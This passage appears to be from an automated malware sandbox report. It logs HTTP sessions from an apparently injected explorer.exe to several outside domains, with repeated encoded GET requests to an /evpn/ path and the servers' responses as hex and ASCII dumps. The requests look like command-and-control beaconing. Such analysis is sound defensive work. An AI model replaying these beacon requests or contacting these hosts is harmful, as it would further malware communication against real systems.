                                                                        Data Raw: 3c 21 2d 2d 0d 0a 09 74 6f 70 2e 6c 6f 63 61 74 69 6f 6e 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6a 61 6d 65 73 73 69 63 69 6c 69 61 2e 63 6f 6d 2f 3f 66 70 3d 63 73 4d 6d 56 73 25 32 46 25 32 42 4b 76 48 4e 34 52 50 72 64 6f 35 79 55 4e 75 25 32 46 61 4e 62 74 78 64 4a 63 69 53 5a 43 4d 69 7a 69 4a 49 31 52 7a 61 46 45 68 49 34 5a 35 65 52 6d 76 6a 31 4a 56 43 66 49 35 78 63 64 4a 61 47 44 58 6f 43 33 59 67 62 46 75 6a 7a 45 4c 6b 6d 42 67 56 25 32 46 76 67 63 71 79 45 63 56 75 4d 44 62 34 33 4e 55 31 4b 4e 5a 6e 6a 4f 6a 74 36 79 53 36 79 4c 32 4e 51 43 52 42 38 64 62 4a 79 53 51 4f 63 6f 79 4f 6d 33 4c 67 25 32 42 76 32 79 39 64 48 6a 58 43 78 55 51 58 50 38 36 59 44 70 51 52 6f 67 50 34 59 25 33 44 26 70 72 76 74 6f 66 3d 64 63 61 55 6f 53 4c 31 51 4d 30 36 6e 38 53 54 37 72 63 49 46 79 54 61 68 68 55 43 36 31 72 4b 57 32 67 63 76 66 55 76 47 48 34 25 33 44 26 70 6f 72 75 3d 34 50 48 48 73 33 34 44 6a 53 67 7a 6a 66 31 41 76 78 73 74 30 36 4c 30 25 32 42 62 36 76 39 44 72 48 74 61 33 42 68 67 58 39 41 43 30 56 39 4a 44 54 33 74 58 52 6b 67 67 53 44 52 65 53 72 61 6c 38 58 62 77 37 35 5a 76 37 76 74 43 33 37 66 45 4e 62 45 6e 4a 25 32 46 37 58 6e 42 63 4c 76 68 33 77 62 6a 76 62 61 72 37 61 30 57 25 32 46 37 77 6e 66 62 45 62 41 50 57 6a 6c 51 66 74 5a 6c 6b 76 25 32 42 76 51 7a 43 42 77 46 6a 4a 6c 33 37 69 63 37 75 48 34 56 25 32 46 66 74 70 5a 43 49 39 4c 65 65 41 4d 55 6a 47 25 32 42 6a 4e 6f 67 71 6d 71 65 4a 6d 76 39 4b 6f 53 48 30 4a 25 32 46 4d 68 6a 50 36 65 63 75 6f 33 4d 26 63 69 66 72 3d 31 26 4a 44 4b 38 69 78 3d 66 68 72 5a 42 6a 78 61 49 30 57 44 72 4f 4d 4d 4c 42 39 69 25 32 46 65 54 63 72 58 72 51 78 75 67 78 2b 6a 67 6f 6a 6d 37 42 41 64 36 66 42 65 36 34 4a 69 4f 57 6c 69 53 43 7a 66 55 6a 50 69 72 4a 7a 4a 43 6d 26 77 34 3d 6a 46 4e 70 33 36 49 68 75 22 3b 0d 0a 09 2f 2a 0d 0a 2d 2d 3e 0d 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4b 58 37 34 69 78 70 7a 56 79 58 62 4a 70 72 63 4c 66 62 48 34 70 73 50 34 2b 4c 32 65 6e 74 71 72 69 30 6c 7a 68 36 70 6b 41 61 58 4c 50 49 63 63 6c 76 36 44 51 42 65 4a 4a 6a 47 46 57 72 42 49 46 36 51 4d 79 46 77 58 54 35 43 43 52 79 6a 53 32 70 65 6e 45 43 41 77 45 41
                                                                        Data Ascii: ...top.location="http://www.jamessicilia.com/?fp=csMmVs%2F%2BKvHN4RPrdo5yUNu%2FaNbtxdJciSZCMiziJI1RzaFEhI4Z5eRmvj1JVCfI5xcdJaGDXoC3YgbFujzELkmBgV%2FvgcqyEcVuMDb43NU1KNZnjOjt6yS6yL2NQCRB8dbJySQOcoyOm3Lg%2Bv2y9dHjXCxUQXP86YDpQRogP4Y%3D&prvtof=dcaUoSL1QM06n8ST7rcIFyTahhUC61rKW2gcvfUvGH4%3D&poru=4PHHs34DjSgzjf1Avxst06L0%2Bb6v9DrHta3BhgX9AC0V9JDT3tXRkggSDReSral8Xbw75Zv7vtC37fENbEnJ%2F7XnBcLvh3wbjvbar7a0W%2F7wnfbEbAPWjlQftZlkv%2BvQzCBwFjJl37ic7uH4V%2FftpZCI9LeeAMUjG%2BjNogqmqeJmv9KoSH0J%2FMhjP6ecuo3M&cifr=1&JDK8ix=fhrZBjxaI0WDrOMMLB9i%2FeTcrXrQxugx+jgojm7BAd6fBe64JiOWliSCzfUjPirJzJCm&w4=jFNp36Ihu";/*--><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEA


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        1192.168.2.34972723.227.38.7480C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Apr 8, 2021 11:10:05.937941074 CEST1395OUTGET /evpn/?JDK8ix=tTQY57yJV1PB58vhZsfw1idcR39uzoBhuFhBLA0LfuUY3fYfkSmldauzSZkrcgPEdi+f&w4=jFNp36Ihu HTTP/1.1
                                                                        Host: www.kinfet.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 11:10:06.077676058 CEST1396INHTTP/1.1 403 Forbidden
                                                                        Date: Thu, 08 Apr 2021 09:10:06 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        X-Sorting-Hat-PodId: -1
                                                                        X-Dc: gcp-us-east1
                                                                        X-Request-ID: da345f65-3dc9-46ad-8b16-fd94fcfb308a
                                                                        Set-Cookie: _shopify_fs=2021-04-08T09%3A10%3A06Z; Expires=Fri, 08-Apr-22 09:10:06 GMT; Domain=kinfet.com; Path=/; SameSite=Lax
                                                                        X-XSS-Protection: 1; mode=block
                                                                        X-Download-Options: noopen
                                                                        X-Content-Type-Options: nosniff
                                                                        X-Permitted-Cross-Domain-Policies: none
                                                                        CF-Cache-Status: DYNAMIC
                                                                        cf-request-id: 095258057e0000cc5abf907000000001
                                                                        Server: cloudflare
                                                                        CF-RAY: 63ca5c4f2f01cc5a-ZRH
                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                        Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72
                                                                        Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4r


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        10192.168.2.34974434.102.136.18080C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Apr 8, 2021 11:11:04.175527096 CEST5167OUTGET /evpn/?JDK8ix=lIAMQw8Bc5WvbtZzc5MVHUptsiPc1Sl8tBJqhUvlbuUAA7ypaYYvmQWduCHy/+CL3sQ0&w4=jFNp36Ihu HTTP/1.1
                                                                        Host: www.curiosityisthecurebook.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 11:11:04.291693926 CEST5167INHTTP/1.1 403 Forbidden
                                                                        Server: openresty
                                                                        Date: Thu, 08 Apr 2021 09:11:04 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 275
                                                                        ETag: "6063a886-113"
                                                                        Via: 1.1 google
                                                                        Connection: close
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        11192.168.2.349745192.185.48.19480C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Apr 8, 2021 11:11:09.627645969 CEST5168OUTGET /evpn/?JDK8ix=ISts4gbMhqyuTmKrSHZmognB97NvFE2BZp5yYtc0d8I84ULtNRTPjTWlODLK7CpkytNF&w4=jFNp36Ihu HTTP/1.1
                                                                        Host: www.usinggroovefunnels.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 11:11:09.776088953 CEST5169INHTTP/1.1 301 Moved Permanently
                                                                        Date: Thu, 08 Apr 2021 09:11:09 GMT
                                                                        Server: Apache
                                                                        Location: http://bitly.ws/9qZUevpn/?JDK8ix=ISts4gbMhqyuTmKrSHZmognB97NvFE2BZp5yYtc0d8I84ULtNRTPjTWlODLK7CpkytNF&w4=jFNp36Ihu
                                                                        Content-Length: 326
                                                                        Connection: close
                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 62 69 74 6c 79 2e 77 73 2f 39 71 5a 55 65 76 70 6e 2f 3f 4a 44 4b 38 69 78 3d 49 53 74 73 34 67 62 4d 68 71 79 75 54 6d 4b 72 53 48 5a 6d 6f 67 6e 42 39 37 4e 76 46 45 32 42 5a 70 35 79 59 74 63 30 64 38 49 38 34 55 4c 74 4e 52 54 50 6a 54 57 6c 4f 44 4c 4b 37 43 70 6b 79 74 4e 46 26 61 6d 70 3b 77 34 3d 6a 46 4e 70 33 36 49 68 75 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://bitly.ws/9qZUevpn/?JDK8ix=ISts4gbMhqyuTmKrSHZmognB97NvFE2BZp5yYtc0d8I84ULtNRTPjTWlODLK7CpkytNF&amp;w4=jFNp36Ihu">here</a>.</p></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        12192.168.2.34974634.102.136.18080C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Apr 8, 2021 11:11:14.840365887 CEST5170OUTGET /evpn/?JDK8ix=uC/MtWgv+YrXZeFWxw8c+UMLGaJCPPY/UiwLcWwP6A/e3Dk62IKxdmGhKI0+YBSelN0N&w4=jFNp36Ihu HTTP/1.1
                                                                        Host: www.cgpizza.net
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 11:11:14.966414928 CEST5170INHTTP/1.1 403 Forbidden
                                                                        Server: openresty
                                                                        Date: Thu, 08 Apr 2021 09:11:14 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 275
                                                                        ETag: "606abe1d-113"
                                                                        Via: 1.1 google
                                                                        Connection: close
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        13192.168.2.34974752.58.78.1680C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Apr 8, 2021 11:11:20.052567959 CEST5171OUTGET /evpn/?JDK8ix=mJ1WicGgYxGiPfNmi48PwwH9NxkuMiIXMjFvraRfIBMfYxjrtIxgIRAmB9RzgRW7JS2o&w4=jFNp36Ihu HTTP/1.1
                                                                        Host: www.physicalrobot.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 11:11:20.070189953 CEST5172INHTTP/1.1 410 Gone
                                                                        Server: openresty/1.13.6.2
                                                                        Date: Thu, 08 Apr 2021 09:10:31 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 35 31 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 35 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 70 68 79 73 69 63 61 6c 72 6f 62 6f 74 2e 63 6f 6d 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 39 0d 0a 20 20 3c 62 6f 64 79 3e 0a 0d 0a 33 64 0d 0a 20 20 20 20 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 72 65 64 69 72 65 63 74 65 64 20 74 6f 20 68 74 74 70 3a 2f 2f 77 77 77 2e 70 68 79 73 69 63 61 6c 72 6f 62 6f 74 2e 63 6f 6d 0a 0d 0a 61 0d 0a 20 20 3c 2f 62 6f 64 79 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 7<html>9 <head>51 <meta http-equiv='refresh' content='5; url=http://www.physicalrobot.com/' />a </head>9 <body>3d You are being redirected to http://www.physicalrobot.coma </body>8</html>0


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        14192.168.2.349748208.91.197.9180C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Apr 8, 2021 11:11:25.228843927 CEST5172OUTGET /evpn/?JDK8ix=fhrZBjxaI0WDrOMMLB9i/eTcrXrQxugx+jgojm7BAd6fBe64JiOWliSCzfUjPirJzJCm&w4=jFNp36Ihu HTTP/1.1
                                                                        Host: www.jamessicilia.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 11:11:25.415476084 CEST5174INHTTP/1.1 200 OK
                                                                        Date: Thu, 08 Apr 2021 09:11:25 GMT
                                                                        Server: Apache
                                                                        Set-Cookie: vsid=928vr3654186853404344; expires=Tue, 07-Apr-2026 09:11:25 GMT; Max-Age=157680000; path=/; domain=www.jamessicilia.com; HttpOnly
                                                                        X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_Ru1fD82/Yqs+3Zye7dtXUZ/oJiDw2u1OxPgHM8xCyLYyWaTMGCWQidzM+A86L7os7uHpkd6J4BLmsTmMgA8SfQ==
                                                                        Content-Length: 2565
                                                                        Keep-Alive: timeout=5, max=123
                                                                        Connection: Keep-Alive
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Data Raw: 3c 21 2d 2d 0d 0a 09 74 6f 70 2e 6c 6f 63 61 74 69 6f 6e 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6a 61 6d 65 73 73 69 63 69 6c 69 61 2e 63 6f 6d 2f 3f 66 70 3d 78 69 77 37 61 7a 43 7a 4b 7a 31 25 32 42 58 56 56 6a 32 6c 67 6b 4b 25 32 42 65 6d 6a 5a 59 64 34 66 38 46 31 59 48 75 64 43 34 43 42 55 32 57 25 32 46 42 63 4c 39 58 38 25 32 42 52 58 71 69 34 75 61 44 52 44 7a 71 45 4d 56 4b 43 32 61 64 6a 59 73 7a 52 59 35 33 7a 44 63 42 32 63 46 4a 31 30 37 47 44 4d 44 72 4a 41 52 4f 4b 30 45 6f 71 55 64 72 48 36 45 66 4e 4f 37 37 65 63 34 4b 53 74 56 37 51 4f 6a 39 58 72 6c 78 66 4f 68 6c 69 49 78 25 32 42 4d 66 41 4c 4a 36 49 65 6b 6b 25 32 42 63 68 44 68 57 32 53 47 73 79 59 75 50 52 6e 50 6c 6f 25 32 46 6b 25 33 44 26 70 72 76 74 6f 66 3d 43 64 68 67 43 46 6c 36 4b 77 64 62 57 6c 39 72 5a 6c 6a 49 5a 49 4a 47 5a 78 62 36 63 64 70 30 48 67 25 32 46 6e 53 56 72 57 4c 4c 59 25 33 44 26 70 6f 72 75 3d 4d 52 63 76 30 30 38 43 6d 4f 50 52 34 37 65 55 5a 46 6f 25 32 42 41 51 79 49 56 6f 47 78 57 51 67 4d 75 65 5a 51 4f 30 4c 58 73 77 70 4e 46 49 7a 63 47 38 39 55 66 68 63 74 41 37 76 74 65 38 5a 6b 46 54 78 66 42 4e 72 38 70 25 32 42 37 65 45 5a 44 6a 4e 45 4f 4f 48 57 46 78 50 54 66 76 30 4c 66 75 25 32 42 61 59 54 7a 68 4a 68 63 58 58 46 25 32 42 6d 57 64 63 73 51 4a 38 72 67 4d 49 33 49 35 69 77 6e 6f 4a 37 58 52 44 30 70 7a 33 4f 57 48 76 6e 4b 65 7a 55 75 64 54 77 45 43 68 48 6e 4b 65 63 4d 75 51 77 71 35 77 77 53 62 46 43 43 54 73 75 6d 33 67 30 39 51 4c 6c 52 64 4b 53 4f 45 6e 6e 6e 79 26 63 69 66 72 3d 31 26 4a 44 4b 38 69 78 3d 66 68 72 5a 42 6a 78 61 49 30 57 44 72 4f 4d 4d 4c 42 39 69 25 32 46 65 54 63 72 58 72 51 78 75 67 78 2b 6a 67 6f 6a 6d 37 42 41 64 36 66 42 65 36 34 4a 69 4f 57 6c 69 53 43 7a 66 55 6a 50 69 72 4a 7a 4a 43 6d 26 77 34 3d 6a 46 4e 70 33 36 49 68 75 22 3b 0d 0a 09 2f 2a 0d 0a 2d 2d 3e 0d 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4b 58 37 34 69 78 70 7a 56 79 58 62 4a 70 72 63 4c 66 62 48 34 70 73 50 34 2b 4c 32 65 6e 74 71 72 69 30 6c 7a 68 36 70 6b 41 61 58 4c 50 49 63 63 6c 76 36 44 51 42 65 4a 4a 6a 47 46 57 72 42 49 46 36 51 4d 79 46 77 58 54 35 43 43 52 79 6a 53 32 70 65 6e 45 43 41 77 45
                                                                        Data Ascii: ...top.location="http://www.jamessicilia.com/?fp=xiw7azCzKz1%2BXVVj2lgkK%2BemjZYd4f8F1YHudC4CBU2W%2FBcL9X8%2BRXqi4uaDRDzqEMVKC2adjYszRY53zDcB2cFJ107GDMDrJAROK0EoqUdrH6EfNO77ec4KStV7QOj9XrlxfOhliIx%2BMfALJ6Iekk%2BchDhW2SGsyYuPRnPlo%2Fk%3D&prvtof=CdhgCFl6KwdbWl9rZljIZIJGZxb6cdp0Hg%2FnSVrWLLY%3D&poru=MRcv008CmOPR47eUZFo%2BAQyIVoGxWQgMueZQO0LXswpNFIzcG89UfhctA7vte8ZkFTxfBNr8p%2B7eEZDjNEOOHWFxPTfv0Lfu%2BaYTzhJhcXXF%2BmWdcsQJ8rgMI3I5iwnoJ7XRD0pz3OWHvnKezUudTwEChHnKecMuQwq5wwSbFCCTsum3g09QLlRdKSOEnnny&cifr=1&JDK8ix=fhrZBjxaI0WDrOMMLB9i%2FeTcrXrQxugx+jgojm7BAd6fBe64JiOWliSCzfUjPirJzJCm&w4=jFNp36Ihu";/*--><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwE


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        15192.168.2.34974923.227.38.7480C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Apr 8, 2021 11:11:30.437684059 CEST5177OUTGET /evpn/?JDK8ix=tTQY57yJV1PB58vhZsfw1idcR39uzoBhuFhBLA0LfuUY3fYfkSmldauzSZkrcgPEdi+f&w4=jFNp36Ihu HTTP/1.1
                                                                        Host: www.kinfet.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 11:11:30.573548079 CEST5178INHTTP/1.1 403 Forbidden
                                                                        Date: Thu, 08 Apr 2021 09:11:30 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        X-Sorting-Hat-PodId: -1
                                                                        X-Dc: gcp-us-east1
                                                                        X-Request-ID: be2a510c-ab66-4b1d-9209-9129da9b5271
                                                                        Set-Cookie: _shopify_fs=2021-04-08T09%3A11%3A30Z; Expires=Fri, 08-Apr-22 09:11:30 GMT; Domain=kinfet.com; Path=/; SameSite=Lax
                                                                        X-Content-Type-Options: nosniff
                                                                        X-Permitted-Cross-Domain-Policies: none
                                                                        X-XSS-Protection: 1; mode=block
                                                                        X-Download-Options: noopen
                                                                        CF-Cache-Status: DYNAMIC
                                                                        cf-request-id: 0952594f8f000023f7b5019000000001
                                                                        Server: cloudflare
                                                                        CF-RAY: 63ca5e5f4d0b23f7-ZRH
                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                        Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 